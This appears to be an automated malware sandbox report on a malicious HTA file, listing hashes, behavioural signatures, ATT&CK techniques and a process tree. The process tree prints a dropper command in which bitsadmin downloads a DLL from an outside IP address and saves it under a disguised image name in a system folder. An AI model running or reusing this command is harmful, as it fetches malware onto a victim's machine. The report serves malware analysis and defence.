bafa75bdfa5344ae1c718207a575eb2daa20b89d0f6ef4ca92b81c5950f9d564

Analysis

max time kernel
81s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
07/02/2023, 10:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

azienda_01.hta
Size

6KB
MD5

b76bbcbd543e10142885d78c832e98f3
SHA1

1127f62830d9dd93de97b412204f832099e7cc7d
SHA256

bafa75bdfa5344ae1c718207a575eb2daa20b89d0f6ef4ca92b81c5950f9d564
SHA512

cb3896793ca5379bb73f75a8e7cf0638584b4c3045c811ff9e10a3be311da2068c139a5f02ff21e7a6ed3c2cfb58ac759abc6497b4f706cbe4c5e60160c8634a
SSDEEP

96:wWySWiLVTUoPg2pwTEeD4b7KdaO3iOaLt3M8Mn3XTPMJsb0ODcFE+Voq3V4dj29o:TU77rIKdn863jMM0OD9+VVF48xYkuX

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
8	2360	mshta.exe
10	2360	mshta.exe
12	2360	mshta.exe
14	2360	mshta.exe
47	2360	mshta.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
4104	bitsadmin.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2360 wrote to memory of 4104	2360	mshta.exe	80
PID 2360 wrote to memory of 4104	2360	mshta.exe	80
PID 2360 wrote to memory of 4104	2360	mshta.exe	80

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\azienda_01.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2360
- C:\Windows\SysWOW64\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://193.0.179.30/azienda.dll C:\Windows\\System32\\LogFiles\\\login.bmp
  2⤵
  - Download via BitsAdmin
  PID:4104

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads